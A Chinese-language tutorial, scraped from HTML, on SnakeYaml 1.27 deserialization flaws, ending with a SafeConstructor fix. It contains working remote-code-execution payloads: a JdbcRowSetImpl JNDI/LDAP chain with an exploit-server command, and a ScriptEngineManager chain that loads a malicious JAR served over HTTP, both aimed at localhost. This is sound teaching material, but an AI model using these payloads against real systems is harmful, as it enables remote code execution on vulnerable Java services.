SnakeYaml漏洞分析与利用教学文档<\/h1>

1. 简介<\/h2>

1.1 YAML基础<\/h3>
YAML是一种人类可读的数据序列化语言，常用于编写配置文件。基本特点：<\/p>
大小写敏感<\/li>
使用缩进表示层级关系<\/li>
缩进只允许使用空格<\/li>
#<\/code>表示注释<\/li>
支持对象、数组、纯量三种数据结构<\/li>
<\/ul>
示例：<\/p>
# YAML对象<\/span>
<\/span><\/span>key<\/span>: 
<\/span><\/span>    child-key<\/span>: value<\/span>
<\/span><\/span>    child-key2<\/span>: value2<\/span>
<\/span><\/span>
<\/span><\/span># YAML数组<\/span>
<\/span><\/span>companies<\/span>:
<\/span><\/span>    -
<\/span><\/span>        id<\/span>: 1<\/span>
<\/span><\/span>        name<\/span>: company1<\/span>
<\/span><\/span>        price<\/span>: 200W<\/span>
<\/span><\/span>    -
<\/span><\/span>        id<\/span>: 2<\/span>
<\/span><\/span>        name<\/span>: company2<\/span>
<\/span><\/span>        price<\/span>: 500W<\/span>
<\/span><\/span><\/code><\/pre>1.2 SnakeYaml库<\/h3>
SnakeYaml是Java中解析YAML的库，提供YAML数据和Java对象相互转换的API：<\/p>

Yaml.load()<\/code>: 将YAML数据反序列化为Java对象<\/li>
Yaml.dump()<\/code>: 将Java对象序列化为YAML格式<\/li>
<\/ul>
2. 基本使用示例<\/h2>
2.1 环境准备<\/h3>

JDK 1.8_66<\/li>
Maven依赖：<\/li>
<\/ul>
<dependency><\/span>
<\/span><\/span>    <groupId><\/span>org.yaml<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>snakeyaml<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>1.27<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><\/code><\/pre>2.2 序列化示例<\/h3>
public<\/span> class<\/span> Person<\/span> {<\/span>
<\/span><\/span>    private<\/span> String username;<\/span>
<\/span><\/span>    private<\/span> int<\/span> age;<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 构造方法、getter和setter
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> SnakeYamlTest<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span>
<\/span><\/span>        Yaml yaml =<\/span> new<\/span> Yaml();<\/span>
<\/span><\/span>        Person person =<\/span> new<\/span> Person(<\/span>"mike"<\/span>,<\/span> 18<\/span>);<\/span>
<\/span><\/span>        String str =<\/span> yaml.<\/span>dump<\/span>(<\/span>person);<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>str);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>输出：<\/p>
!!SnakeYaml.Person {age: 18, username: mike}
<\/code><\/pre>
注：!!<\/code>表示对应的类名，序列化过程会触发类属性对应的get方法<\/p>
2.3 反序列化示例<\/h3>
public<\/span> class<\/span> SnakeYamlTest<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span>
<\/span><\/span>        String str =<\/span> "!!SnakeYaml.Person {age: 18, username: mike}"<\/span>;<\/span>
<\/span><\/span>        Yaml yaml =<\/span> new<\/span> Yaml();<\/span>
<\/span><\/span>        Person person =<\/span> (<\/span>Person)<\/span> yaml.<\/span>load<\/span>(<\/span>str);<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>person);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>输出：<\/p>
SnakeYaml.Person@48533e64
<\/code><\/pre>
注：反序列化过程会触发类属性对应的set方法<\/p>
3. 漏洞分析与利用<\/h2>
3.1 JdbcRowSetImpl链利用<\/h3>
环境要求<\/h4>

SnakeYaml 1.27<\/li>
JDK 1.8_66<\/li>
<\/ul>
利用步骤<\/h4>

启动LDAP服务：<\/li>
<\/ol>
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 127.0.0.1 -C "calc.exe"<\/span>
<\/span><\/span><\/code><\/pre>
POC：<\/li>
<\/ol>
!!com.sun.rowset.JdbcRowSetImpl<\/span> {dataSourceName: ldap:\/\/127.0.0.1:1389\/5cjybz, autoCommit<\/span>: true<\/span>}
<\/span><\/span><\/code><\/pre>
测试代码：<\/li>
<\/ol>
public<\/span> class<\/span> PocTest1<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span>
<\/span><\/span>        String poc =<\/span> "!!com.sun.rowset.JdbcRowSetImpl {dataSourceName: ldap:\/\/127.0.0.1:1389\/5cjybz, autoCommit: true}"<\/span>;<\/span>
<\/span><\/span>        Yaml yaml =<\/span> new<\/span> Yaml();<\/span>
<\/span><\/span>        yaml.<\/span>load<\/span>(<\/span>poc);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>漏洞原理<\/h4>

反序列化过程中会调用JdbcRowSetImpl<\/code>的setAutoCommit<\/code>方法<\/li>
setAutoCommit<\/code>方法内部会调用connect<\/code>方法<\/li>
connect<\/code>方法通过JNDI查找dataSourceName<\/code>指定的LDAP服务<\/li>
触发JNDI注入，执行恶意代码<\/li>
<\/ol>
关键调用栈<\/h4>
getObjectFactoryFromReference:163, NamingManager
getObjectInstance:189, DirectoryManager
c_lookup:1085, LdapCtx
p_lookup:542, ComponentContext
lookup:177, PartialCompositeContext
lookup:205, GenericURLContext
lookup:94, ldapURLContext
lookup:417, InitialContext
connect:624, JdbcRowSetImpl
setAutoCommit:4067, JdbcRowSetImpl
invoke0:-1, NativeMethodAccessorImpl
invoke:62, NativeMethodAccessorImpl
invoke:43, DelegatingMethodAccessorImpl
invoke:497, Method
set:77, MethodProperty
constructJavaBean2ndStep:285, Constructor$ConstructMapping
construct:171, Constructor$ConstructMapping
construct:331, Constructor$ConstructYamlObject
constructObjectNoCheck:229, BaseConstructor
constructObject:219, BaseConstructor
constructDocument:173, BaseConstructor
getSingleData:157, BaseConstructor
loadFromReader:490, Yaml
load:416, Yaml
<\/code><\/pre>
3.2 ScriptEngineManager链利用<\/h3>
SPI机制简介<\/h4>
SPI(Service Provider Interface)是JDK内置的服务提供发现机制。通过在ClassPath路径下的META-INF\/services<\/code>文件夹下查找文件，自动加载文件中所定义的类。<\/p>
环境要求<\/h4>

SnakeYaml 1.27<\/li>
JDK 1.8_66<\/li>
<\/ul>
利用步骤<\/h4>


准备恶意JAR包：<\/p>

使用项目：https:\/\/github.com\/artsploit\/yaml-payload.git<\/li>
修改AwesomeScriptEngineFactory.java<\/code>中的命令执行代码<\/li>
编译：
javac src\/artsploit\/AwesomeScriptEngineFactory.java
<\/span><\/span>jar -cvf yaml-payload.jar -C src\/ .
<\/span><\/span><\/code><\/pre><\/li>
注意：必须使用一致的Java版本编译<\/li>
<\/ul>
<\/li>

启动Web服务：<\/p>
<\/li>
<\/ol>
python -m http.server 8080<\/span>
<\/span><\/span><\/code><\/pre>
POC：<\/li>
<\/ol>
!!javax.script.ScriptEngineManager<\/span> [
<\/span><\/span>  !!java.net.URLClassLoader<\/span> [[
<\/span><\/span>    !!java.net.URL<\/span> ["http:\/\/127.0.0.1:8080\/yaml-payload.jar"<\/span>]
<\/span><\/span>  ]]
<\/span><\/span>]
<\/span><\/span><\/code><\/pre>
测试代码：<\/li>
<\/ol>
public<\/span> class<\/span> PocTest2<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span>
<\/span><\/span>        String poc =<\/span> "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http:\/\/127.0.0.1:8080\/yaml-payload.jar\"]]]]\n"<\/span>;<\/span>
<\/span><\/span>        Yaml yaml =<\/span> new<\/span> Yaml();<\/span>
<\/span><\/span>        yaml.<\/span>load<\/span>(<\/span>poc);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>漏洞原理<\/h4>

反序列化过程中会实例化ScriptEngineManager<\/code><\/li>
ScriptEngineManager<\/code>构造函数会通过SPI机制加载META-INF\/services<\/code>中定义的类<\/li>
从恶意JAR包中加载并实例化AwesomeScriptEngineFactory<\/code>类<\/li>
在构造函数中执行恶意代码<\/li>
<\/ol>
关键调用栈<\/h4>
nextService:381, ServiceLoader$LazyIterator
next:404, ServiceLoader$LazyIterator
next:480, ServiceLoader$1
initEngines:122, ScriptEngineManager
init:84, ScriptEngineManager
<init>:75, ScriptEngineManager
newInstance0:-1, NativeConstructorAccessorImpl
newInstance:62, NativeConstructorAccessorImpl
newInstance:45, DelegatingConstructorAccessorImpl
newInstance:422, Constructor
construct:570, Constructor$ConstructSequence
construct:331, Constructor$ConstructYamlObject
constructObjectNoCheck:229, BaseConstructor
constructObject:219, BaseConstructor
constructDocument:173, BaseConstructor
getSingleData:157, BaseConstructor
loadFromReader:490, Yaml
load:416, Yaml
<\/code><\/pre>
4. 漏洞修复方案<\/h2>
4.1 安全使用建议<\/h3>

禁止yaml.load<\/code>方法中的参数可控<\/li>
使用安全构造函数：<\/li>
<\/ol>
Yaml yaml =<\/span> new<\/span> Yaml(<\/span>new<\/span> SafeConstructor());<\/span>
<\/span><\/span><\/code><\/pre>4.2 SafeConstructor白名单<\/h3>
SafeConstructor<\/code>定义了反序列化类的白名单：<\/p>
public<\/span> SafeConstructor<\/span>(<\/span>LoaderOptions loadingConfig)<\/span> {<\/span>
<\/span><\/span>    super<\/span>(<\/span>loadingConfig);<\/span>
<\/span><\/span>    this<\/span>.<\/span>yamlConstructors<\/span>.<\/span>put<\/span>(<\/span>Tag.<\/span>NULL<\/span>,<\/span> new<\/span> ConstructYamlNull());<\/span>
<\/span><\/span>    this<\/span>.<\/span>yamlConstructors<\/span>.<\/span>put<\/span>(<\/span>Tag.<\/span>BOOL<\/span>,<\/span> new<\/span> ConstructYamlBool());<\/span>
<\/span><\/span>    this<\/span>.<\/span>yamlConstructors<\/span>.<\/span>put<\/span>(<\/span>Tag.<\/span>INT<\/span>,<\/span> new<\/span> ConstructYamlInt());<\/span>
<\/span><\/span>    this<\/span>.<\/span>yamlConstructors<\/span>.<\/span>put<\/span>(<\/span>Tag.<\/span>FLOAT<\/span>,<\/span> new<\/span> ConstructYamlFloat());<\/span>
<\/span><\/span>    this<\/span>.<\/span>yamlConstructors<\/span>.<\/span>put<\/span>(<\/span>Tag.<\/span>BINARY<\/span>,<\/span> new<\/span> ConstructYamlBinary());<\/span>
<\/span><\/span>    this<\/span>.<\/span>yamlConstructors<\/span>.<\/span>put<\/span>(<\/span>Tag.<\/span>TIMESTAMP<\/span>,<\/span> new<\/span> ConstructYamlTimestamp());<\/span>
<\/span><\/span>    this<\/span>.<\/span>yamlConstructors<\/span>.<\/span>put<\/span>(<\/span>Tag.<\/span>OMAP<\/span>,<\/span> new<\/span> ConstructYamlOmap());<\/span>
<\/span><\/span>    this<\/span>.<\/span>yamlConstructors<\/span>.<\/span>put<\/span>(<\/span>Tag.<\/span>PAIRS<\/span>,<\/span> new<\/span> ConstructYamlPairs());<\/span>
<\/span><\/span>    this<\/span>.<\/span>yamlConstructors<\/span>.<\/span>put<\/span>(<\/span>Tag.<\/span>SET<\/span>,<\/span> new<\/span> ConstructYamlSet());<\/span>
<\/span><\/span>    this<\/span>.<\/span>yamlConstructors<\/span>.<\/span>put<\/span>(<\/span>Tag.<\/span>STR<\/span>,<\/span> new<\/span> ConstructYamlStr());<\/span>
<\/span><\/span>    this<\/span>.<\/span>yamlConstructors<\/span>.<\/span>put<\/span>(<\/span>Tag.<\/span>SEQ<\/span>,<\/span> new<\/span> ConstructYamlSeq());<\/span>
<\/span><\/span>    this<\/span>.<\/span>yamlConstructors<\/span>.<\/span>put<\/span>(<\/span>Tag.<\/span>MAP<\/span>,<\/span> new<\/span> ConstructYamlMap());<\/span>
<\/span><\/span>    this<\/span>.<\/span>yamlConstructors<\/span>.<\/span>put<\/span>((<\/span>Object)<\/span>null<\/span>,<\/span> undefinedConstructor);<\/span>
<\/span><\/span>    this<\/span>.<\/span>yamlClassConstructors<\/span>.<\/span>put<\/span>(<\/span>NodeId.<\/span>scalar<\/span>,<\/span> undefinedConstructor);<\/span>
<\/span><\/span>    this<\/span>.<\/span>yamlClassConstructors<\/span>.<\/span>put<\/span>(<\/span>NodeId.<\/span>sequence<\/span>,<\/span> undefinedConstructor);<\/span>
<\/span><\/span>    this<\/span>.<\/span>yamlClassConstructors<\/span>.<\/span>put<\/span>(<\/span>NodeId.<\/span>mapping<\/span>,<\/span> undefinedConstructor);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>5. 总结<\/h2>

SnakeYaml的反序列化漏洞主要源于可以加载任意类并调用其方法<\/li>
两种主要利用方式：

JdbcRowSetImpl链：通过JNDI注入实现RCE<\/li>
ScriptEngineManager链：通过SPI机制加载恶意类实现RCE<\/li>
<\/ul>
<\/li>
修复方案是使用SafeConstructor<\/code>限制可反序列化的类<\/li>
关键点在于理解YAML反序列化过程中如何实例化对象和调用方法<\/li>
<\/ol>
通过本文的学习，读者应该能够理解SnakeYaml漏洞的原理、利用方式及防御方法，在实际开发中安全地使用SnakeYaml库。<\/p>
SnakeYaml漏洞分析与利用教学文档<\/h1>

1. 简介<\/h2>

2. 基本使用示例<\/h2>

3. 漏洞分析与利用<\/h2>

3.1 JdbcRowSetImpl链利用<\/h3>

3.2 ScriptEngineManager链利用<\/h3>

SPI机制简介<\/h4> SPI(Service Provider Interface)是JDK内置的服务提供发现机制。通过在ClassPath路径下的META-INF\/services<\/code>文件夹下查找文件，自动加载文件中所定义的类。<\/p>

4. 漏洞修复方案<\/h2>

SPI机制简介<\/h4>
SPI(Service Provider Interface)是JDK内置的服务提供发现机制。通过在ClassPath路径下的`META-INF\/services<\/code>文件夹下查找文件，自动加载文件中所定义的类。<\/p>`
